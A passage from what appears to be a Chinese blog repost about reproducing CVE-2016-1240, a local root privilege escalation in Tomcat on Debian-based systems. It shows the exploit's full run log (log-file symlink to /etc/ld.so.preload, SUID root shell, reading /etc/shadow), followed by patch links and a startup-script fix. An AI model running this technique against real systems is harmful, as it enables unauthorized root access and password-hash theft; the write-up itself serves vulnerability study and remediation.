  12. ii  libtomcat7-java              7.0.68-1ubuntu0.1               all          Servlet and JSP engine -- core libraries
  13. ii  tomcat7                      7.0.68-1ubuntu0.1               all          Servlet and JSP engine
  14. ii  tomcat7-common               7.0.68-1ubuntu0.1               all          Servlet and JSP engine -- common files
  15.  
  16. tomcat7@ubuntu:/tmp$ ./tomcat-rootprivesc-deb.sh /var/log/tomcat7/catalina.out 
  17.  
  18. Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit
  19. CVE-2016-1240
  20.  
  21. Discovered and coded by: 
  22.  
  23. Dawid Golunski 
  24.  
  25. http://legalhackers.com
  26.  
  27. [+] Starting the exploit in [active] mode with the following privileges: 
  28. uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)
  29.  
  30. [+] Target Tomcat log file set to /var/log/tomcat7/catalina.out
  31.  
  32. [+] Compiling the privesc shared library (/tmp/privesclib.c)
  33.  
  34. [+] Backdoor/low-priv shell installed at: 
  35. -rwxr-xr-x 1 tomcat7 tomcat7 1037464 Sep 30 22:27 /tmp/tomcatrootsh
  36.  
  37. [+] Symlink created at: 
  38. lrwxrwxrwx 1 tomcat7 tomcat7 18 Sep 30 22:27 /var/log/tomcat7/catalina.out -> /etc/ld.so.preload
  39.  
  40. [+] Waiting for Tomcat to re-open the logs/Tomcat service restart...
  41. You could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)
  42.  
  43.  
  44. [+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: 
  45. -rw-r--r-- 1 tomcat7 root 19 Sep 30 22:28 /etc/ld.so.preload
  46.  
  47. [+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload
  48.  
  49. [+] The /etc/ld.so.preload file now contains: 
  50. /tmp/privesclib.so
  51.  
  52. [+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!
  53.  
  54. [+] Rootshell got assigned root SUID perms at: 
  55. -rwsrwxrwx 1 root root 1037464 Sep 30 22:27 /tmp/tomcatrootsh
  56.  
  57. Please tell me you're seeing this too ;)
  58.  
  59.  
  60. [+] Executing the rootshell /tmp/tomcatrootsh now! 
  61.  
  62. tomcatrootsh-4.3# id
  63. uid=110(tomcat7) gid=118(tomcat7) euid=0(root) groups=118(tomcat7)
  64. tomcatrootsh-4.3# whoami
  65. root
  66. tomcatrootsh-4.3# head -n3 /etc/shadow
  67. root:$6$oaf[cut]:16912:0:99999:7:::
  68. daemon:*:16912:0:99999:7:::
  69. bin:*:16912:0:99999:7:::
  70. tomcatrootsh-4.3# exit
  71. exit

修复建议

   目前,Debian、Ubuntu等相关操作系统厂商已修复并更新受影响的Tomcat安装包。受影响用户可采取以下解决方案:

    1、更新Tomcat服务器版本:
    (1)针对Ubuntu公告链接
http://www.ubuntu.com/usn/usn-3081-1/
    (2)针对Debian公告链接
https://lists.debian.org/debian-security-announce/2016/msg00249.html
https://www.debian.org/security/2016/dsa-3669
https://www.debian.org/security/2016/dsa-3670
    2、加入-h参数防止其他文件所有者被更改,即更改Tomcat的启动脚本为:
chown -h $TOMCAT6_USER “$CATALINA_PID” “$CATALINA_BASE”/logs/catalina.out

参考链接

CVE-2019-0232漏洞复现_whh6tl的博客-CSDN博客_cve-2019-0232

(CVE-2020-1938)Apache Tomcat远程代码执行漏洞复现_whh6tl的博客-CSDN博客

Tomcat Session(CVE-2020-9484)反序列化漏洞复现_白冷的博客-CSDN博客_cve-2020-9484

Tomcat反序列化漏洞(CVE-2016-8735) - 墨鱼菜鸡 - 博客园

https://i4t.com/1545.html

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/爱喝兽奶帝天荒/article/detail/1005790
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号